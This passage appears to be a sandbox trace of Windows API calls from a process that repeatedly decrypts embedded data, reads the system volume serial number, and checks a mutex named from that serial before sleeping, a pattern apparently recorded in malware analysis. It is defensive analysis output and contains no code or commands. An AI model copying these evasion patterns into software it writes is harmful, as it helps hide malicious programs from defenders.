hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0038.623] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.623] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.623] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0038.623] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0038.623] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e4ba8) returned 1 [0038.623] CryptSetKeyParam (hKey=0x2e4ba8, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0038.623] CryptDecrypt (in: hKey=0x2e4ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0038.623] CryptDestroyKey (hKey=0x2e4ba8) returned 1 [0038.623] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0038.623] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x0 [0038.623] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4200") returned 0x94 [0038.623] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x0 [0038.623] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.623] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0038.623] ReleaseMutex (hMutex=0x94) returned 1 [0038.623] CloseHandle (hObject=0x94) returned 1 [0038.624] Sleep (dwMilliseconds=0x3e8) [0040.165] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0040.165] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e86f0) returned 1 [0040.165] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0040.165] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0040.165] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0040.165] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0040.165] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0040.165] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0040.165] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e86f0) returned 1 [0040.165] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0040.165] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0040.165] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0040.165] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0040.165] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0040.165] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0040.165] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0040.165] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0040.165] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0040.165] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0040.165] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e86f0) returned 1 [0040.165] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0040.165] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0040.166] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0040.166] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0040.166] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x94 [0040.166] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x102 [0040.166] CloseHandle (hObject=0x94) returned 1 [0040.166] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0040.166] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0040.166] Sleep (dwMilliseconds=0x3e8) [0041.756] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0041.756] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e86f0) returned 1 [0041.756] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0041.756] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0041.756] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0041.756] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0041.756] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0041.756] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0041.756] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e86f0) returned 1 [0041.756] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0041.756] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0041.756] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0041.756] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0041.756] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0041.756] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0041.756] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0041.756] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0041.757] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0041.757] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0041.757] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e86f0) returned 1 [0041.757] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0041.757] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0041.757] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0041.757] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0041.757] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x94 [0041.757] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x102 [0041.757] CloseHandle (hObject=0x94) returned 1 [0041.757] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0041.757] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0041.757] Sleep (dwMilliseconds=0x3e8) [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0042.989] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e86f0) returned 1 [0042.989] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0042.989] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0042.989] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0042.989] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e86f0) returned 1 [0042.989] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0042.989] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0042.989] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0042.989] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0042.989] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0042.989] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0042.989] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0042.989] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0042.989] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0042.989] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e86f0) returned 1 [0042.989] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0042.989] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0042.989] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0042.989] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0042.989] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x94 [0042.990] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x102 [0042.990] CloseHandle (hObject=0x94) returned 1 [0042.990] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0042.990] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0042.990] Sleep (dwMilliseconds=0x3e8) [0044.002] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0044.002] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2e86f0) returned 1 [0044.002] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0044.002] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafd84 | out: pbData=0x8c1470, pdwDataLen=0xaafd84) returned 1 [0044.002] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.002] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0044.002] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0044.002] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0044.002] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2e86f0) returned 1 [0044.003] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0044.003] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0xaafd5c | out: pbData=0x8c14e8, pdwDataLen=0xaafd5c) returned 1 [0044.003] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0044.003] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.003] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0044.003] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0044.003] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2e86f0) returned 1 [0044.003] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0044.003] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0xaafdb8 | out: pbData=0x8c1470, pdwDataLen=0xaafdb8) returned 1 [0044.003] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.003] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0044.003] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x94 [0044.003] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0x0) returned 0x102 [0044.003] CloseHandle (hObject=0x94) returned 1 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.003] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0044.003] Sleep (dwMilliseconds=0x3e8) [0045.273] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0045.273] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2ebcb0) returned 1 [0045.273] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0045.273] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafd84 | out: pbData=0x8c1718, pdwDataLen=0xaafd84) returned 1 [0045.273] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0045.273] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0045.273] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14d8 [0045.273] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0045.273] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2ebcb0) returned 1 [0045.273] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0045.273] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xaafd5c | out: pbData=0x8c5480, pdwDataLen=0xaafd5c) returned 1 [0045.273] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0045.273] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0045.273] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0045.273] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0045.273] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0045.273] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0045.274] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0045.274] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1718 [0045.274] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2ebcb0) returned 1 [0045.274] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0045.274] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafdb8 | out: pbData=0x8c1718, pdwDataLen=0xaafdb8) returned 1 [0045.274] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0045.274] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14d8 [0045.274] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x118 [0045.274] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0045.274] CloseHandle (hObject=0x118) returned 1 [0045.274] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0045.274] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0045.274] Sleep (dwMilliseconds=0x3e8) [0050.352] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0050.352] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2ebcb0) returned 1 [0050.352] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0050.352] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafd84 | out: pbData=0x8c1718, pdwDataLen=0xaafd84) returned 1 [0050.352] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0050.352] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0050.352] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14d8 [0050.352] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0050.352] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd40, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafda8 | out: phKey=0xaafda8*=0x2ebcb0) returned 1 [0050.352] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafd90, dwFlags=0x0) returned 1 [0050.352] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0xaafd5c | out: pbData=0x8c5480, pdwDataLen=0xaafd5c) returned 1 [0050.352] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0050.352] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0050.352] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0050.352] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0050.352] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0050.352] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaafe10, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaafe10*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0050.353] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0050.353] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1718 [0050.353] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd9c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafe04 | out: phKey=0xaafe04*=0x2ebcb0) returned 1 [0050.353] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdec, dwFlags=0x0) returned 1 [0050.353] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafdb8 | out: pbData=0x8c1718, pdwDataLen=0xaafdb8) returned 1 [0050.353] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0050.353] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14d8 [0050.353] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x118 [0050.353] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0050.353] CloseHandle (hObject=0x118) returned 1 [0050.353] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0050.353] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d8 | out: hHeap=0x8c0000) returned 1 [0050.353] Sleep (dwMilliseconds=0x3e8) [0054.390] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0054.390] CryptImportKey (in: hProv=0x2e4fe0, pbData=0xaafd68, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaafdd0 | out: phKey=0xaafdd0*=0x2ebcb0) returned 1 [0054.390] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0xaafdb8, dwFlags=0x0) returned 1 [0054.390] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0xaafd84 | out: pbData=0x8c1718, pdwDataLen=0xaafd84) returned 1 [0054.390] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0054.390] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0054.390] RtlAllocateHeap 